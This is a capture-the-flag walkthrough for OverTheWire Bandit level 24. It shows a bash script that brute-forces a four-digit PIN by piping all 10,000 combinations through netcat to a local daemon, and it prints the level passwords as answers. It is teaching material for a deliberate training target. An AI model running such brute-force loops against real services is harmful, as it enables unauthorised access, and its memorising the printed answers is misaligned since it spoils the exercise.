Login

SSH: ssh bandit24@bandit.labs.overthewire.org -p 2220

Password: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Task

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

A little bit of Theory

In this level, we need the theory from previous levels. Namely grep (Level 6) and netcat (Level 15/Level 21) and bash scripting basics.

A for-loop in bash has the following syntax:

1
2
3
4

for var in 1 2 ... N
do
	#something
done

If the variable is looped over a specific range, it might be easier to only write the bounds. For example, if we want to loop over 1-10, the syntax would be {0..10}. If we additionally want every number to have two digits (00, 01, 02, … 10), we can add the zero digit to the number {00..10}.

Solution

First, I connected to the port with netcat to see the script and its response.

1
2
3
4

bandit24@bandit:~$ nc localhost 30002
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ 0000
Wrong! Please enter the correct pincode. Try again.

We see that when we send the wrong pincode, we get a one-line response. This is important for later.

Since brute-forcing the pincode per hand would be quite annoying, I wrote a script to do it for me:

1
2
3
4
5
6
7
8

#!/bin/bash

for i in {0000..9999}
do
        echo UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i >> possibilities.txt
done

cat possibilities.txt | nc localhost 30002 > result.txt

As you can see, the script is divided into two parts. First, I used a for loop over all possible pin codes. Each possibility is appended to a file called ‘posibilities.txt’. In the second part, the possibilities are sent to the daemon. The output is saved in a file called ‘results.txt’.

Now that the script is programmed, we need to save it. I created a folder and saved the script in it (remember to make it executable).

1
2
3
4
5

bandit24@bandit:~$ mktemp -d
/tmp/tmp.3YQNHtW1Uu
bandit24@bandit:~$ cd /tmp/tmp.3YQNHtW1Uu
bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ nano brute_force_pin.sh
bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ chmod +x brute_force_pin.sh

Next, we need to run the script. After running the script, we can check if it worked by making sure the two files are created.

1
2
3

bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ ./brute_force_pin.sh 
bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ ls
brute_force_pin.sh  possibilities.txt  result.txt

The result will contain the output of all the answers from sending all different pincode possibilities to netcat. So now we only need to filter the response where the pincode is correct. We can do this with what we have learned from the first time run. We use grep and filter out all lines with ‘Wrong! Please enter the correct pincode. Try again.’ - though it is also enough to filter for the word ‘Wrong’. As a result, the intro and only the line that was produced by the correct pincode should be returned.

1
2
3
4
5
6

bandit24@bandit:/tmp/tmp.3YQNHtW1Uu$ sort result.txt | grep -v "Wrong!"

Correct!
Exiting.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

https://overthewire.org/wargames/bandit/bandit25.html